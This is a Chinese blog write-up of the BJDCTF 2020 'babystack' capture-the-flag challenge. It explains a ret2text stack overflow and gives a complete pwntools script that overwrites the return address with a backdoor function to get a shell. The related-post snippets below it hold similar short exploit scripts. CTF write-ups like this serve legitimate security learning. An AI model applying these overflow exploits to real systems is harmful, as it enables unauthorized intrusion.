【PWN · ret2text】[BJDCTF 2020]babystack

已于 2023-05-08 09:03:35 修改
阅读量731 收藏 2
点赞数
分类专栏: 【PWN · Stack】 文章标签: PWN ret2text
于 2023-04-20 00:39:38 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Mr_Fmnwon/article/details/130256689
版权

新手上路~低速慢行~

目录

前言

1. checksec

2. IDA 反汇编

3. payload编写

4. exp编写

5. pwntools用法

前言

作为pwn新手,尽可能在刷题中,记录、学习一些通用的知识点,因此wp是少不了的。

本题是一道简单的ret2text

1. checksec

没有开启栈保护

2. IDA 反汇编

发现危险函数read

 

发现后门函数backdoor

3. payload编写

通过buf距离栈基址偏移10h

 且后门函数地址为0x4006E6   可以构造:

payload: 填充buf(10h)+填充ebp(64位→8字节)+修改return地址(0x4006E6)

payload=b’a’*(0x10+0x8)+p64(0x4006E6)

4. exp编写

基本的代码框架

from pwn import *
r=remote("node2.anna.nssctf.cn",28076)

r.recvuntil("name:\\n")
r.sendline("-1") 
r.recvuntil("name?")

backdoor=0x4006e6
payload=b'a'*(0x10+0x8)+p64(backdoor)
r.sendline(payload)
r.interactive()

如此即可获得shell,cat flag即可获得flag

5. pwntools用法

这里

作为最好用的pwn工具,简单记一下用法:

  • 连接:本地process()、远程remote( , );对于remote函数可以接url并且指定端口
  • 数据处理:主要是对整数进行打包:p32、p64是打包为二进制,u32、u64是解包为二进制
  • IO模块:这个比较容易跟zio搞混,记住zio是read、write,pwn是recv、send
Mr_Fmnwon
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
入门pwn题目ret2text
03-26
入门pwn题目ret2text
pwn07.ret2syscall例题
11-11
ret2syscall例题
XCTF PWN高手进阶区之babystack
neuisf的博客
01-30 465
此题,开启了RELRO、NX、CANARY,未开启PIE,只有read函数溢出存在溢出可能。 第一,泄露canary,程序会通过puts函数输出缓冲区s的内容。puts函数在输出时,只有遇到\0才会结束,而缓冲区s又和main函数的canary相连,此时,输入和缓冲区大小相等的字符串,溢出的\n将会覆盖canary的第一字节00,从而将canary的后三个字节输出,构建canary。 第二,获取s...
BUUCTF-Pwn-bjdctf_2020_babystack2
餐桌上的猫
03-25 126
exp from pwn import* p=remote('node4.buuoj.cn',26509) backdoor=0x0400726 ret=0x40073a p.sendlineafter(b'name:\n',b'-1') payload=b'a'*(0x10+8)+p64(ret)+p64(backdoor) p.sendlineafter(b'name?\n',payload) p.interactive()
bjdctf_2020_babystack
m0sway的博客
03-24 1527
bjdctf_2020_babystack WriteUp BUU_PWN
[BJDCTF 2020]babystack2.0
最新发布
llovewuzhengzi的博客
10-22 142
不存在file.plt[“backdoor”] plt是外部函数才有的 只能用file.symbol[“backdoor”]HIDWORD作用是取得某个8字节变量(即32位的值)在内存中处于高位的四个字节,即两个word长的数据。LODWORD作用是取得某个8字节变量(即32位的值)在内存中处于低位的四个字节,即两个word长的数据。用file.plt[“system”]不行,因为直接这样覆盖返回地址没有参数。IDA的栈不完全对,保存的ebp都没有显示,所以IDA只能参考。
bjdctf_2020_babystack题解
OrientalGlass的博客
01-08 320
send是模拟交互的情况,如果使用send(0x111)会有报错,并且发送的字符串要带上换行符,否则会无法结束输入。先输入一个整形数据用于确定buf串需要读入多少个字节,这里后续使用的是0x111。nbytes在buf下方,并且nbytes是qword类型,占8个字节。解释了为什么第一次send要使用字符串类型而不能直接发送int类型。不过这里还有一个异或就是本机运行该程序不能成功获取执行权,非常奇怪。再发送覆盖数据覆盖掉返回地址执行backdoor函数即可。首先输入一个足以覆盖掉返回地址的数字。
bjdctf_2020_babystack【BUUCTF】
qq_41696518的博客
08-26 514
bjdctf_2020_babystack
PWN · IntegerOverflow & ret2text】[BJDCTF 2020]babystack2.0
Mr_Fmnwon的博客
05-27 894
整数溢出漏洞——对于有/无符号数,长/短位宽转换时机器码的变换策略所指。整数溢出一般与其他堆栈溢出相结合,然而其中的内容其实远不止这些,还需要深层次刷题,进一步掌握了解整数溢出。
[buuctf]bjdctf_2020_babystack
逆向萌新的博客
06-19 621
[buuctf]bjdctf_2020_babystack
ret2libc2pwn 入门题
02-11
pwn 入门题
CTF-Pwn-[BJDCTF 2nd]rci
01-09
CTF-Pwn-[BJDCTF 2nd]rci 博客说明 文章所涉及的资料来自互联网整理和个人总结,意在于个人学习和经验汇总,如有什么地方侵权,请联系本人删除,谢谢!本文仅用于学习与交流,不得用于非法用途! CTP平台 网址 ...
ret2libc1pwn 入门题
02-11
pwn 入门题
bjdctf_2020_babystack 1
CYXMDTT的博客
03-22 294
发现scanf会读入一个输入的数,赋值给nbytes ,之后read读取nbytes大小的字符,说明我们可以溢出任意长度。之后在Functions name处可发现后门函数backdoor。用checksec查看,发现开启了NX保护。执行完程序后用64位IDA进行分析。运行它直接拿到shell。
BUU刷题(三)
playmaker的博客
03-13 898
BUU刷题(三) fm from pwn import * context.log_level='debug' p=process('./fm') p=remote("node3.buuoj.cn","27782") payload=p32(0x0804a02c)+'%11$n' p.sendline(payload) p.interactive() others_shellcode 拿到题目直...
BUUCTF PWN 刷题 1-15题
农夫果园好好喝的博客
08-21 1963
经典栈溢出漏洞。
pwn ret2libc原理
08-22
pwn ret2libc是一种攻击技术,其原理是通过利用程序中的栈溢出漏洞,来控制程序的执行流程,以达到执行libc中的函数的目的。 在ret2libc攻击中,程序会调用libc库中的函数,例如system函数,来执行特定的操作。但是...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值